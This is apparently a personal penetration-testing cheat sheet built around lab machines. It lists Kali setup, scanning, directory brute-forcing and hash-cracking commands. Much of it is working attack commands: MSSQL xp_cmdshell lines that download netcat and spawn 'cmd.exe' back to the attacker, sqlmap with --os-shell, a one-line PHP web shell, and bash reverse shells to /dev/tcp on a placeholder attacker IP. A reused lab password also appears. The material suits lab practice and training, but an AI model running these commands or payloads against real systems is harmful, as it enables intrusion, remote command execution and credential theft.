Pentesting tools and useful commands

GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Kali OS

Select Network Repositories


echo "deb kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list

More stable:

echo "deb kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list

Install all tools:

sudo apt install -y kali-linux-large

Install GUI:

sudo apt install -y kali-win-kex

GUI Documentation. Run GUI, to exit from full screen mode press F8:

kex --win -s

Wappalyzer — browser extension to see the technologies used on websites.


sudo openvpn --config vpn.ovpn --daemon

The network interface can be checked by running the ifconfig command in the terminal.


sudo ifconfig tun1 down
Search WebCatalogs on site:
dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt


sudo responder -I tun0

John the ripper

zip2john > hashes
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Identify possible hashes

hashid 2cb42f8734ea607eefed3b70af13bbd3

Crack hash

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Pentesting MSSQL

MSSQL Injection Cheat Sheet

Impacket mssql client

impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 443"

SQL map

sqlmap -u '' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u '' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell

winPEAS (Windows Privilege Escalation)

linPEAS (Linux Privilege Escalation)

Evil Win Remote

evil-winrm -i -u administrator -p badminton


sudo nmap -sV

sudo nmap -sV -sC

sudo nmap -p- --min-rate 5000 -sV


go install
git clone
gobuster dir --url --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb


mysql -h -u root
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Set to use the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.


smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server

Fully interactive shells

Simple PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Reverse Shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' >


bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"

Start ncat listener

nc -nvlp 1337

Start Web Server

python3 -m http.server 8000

Start example


Functional shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Upgrade shell

script /dev/null -c bash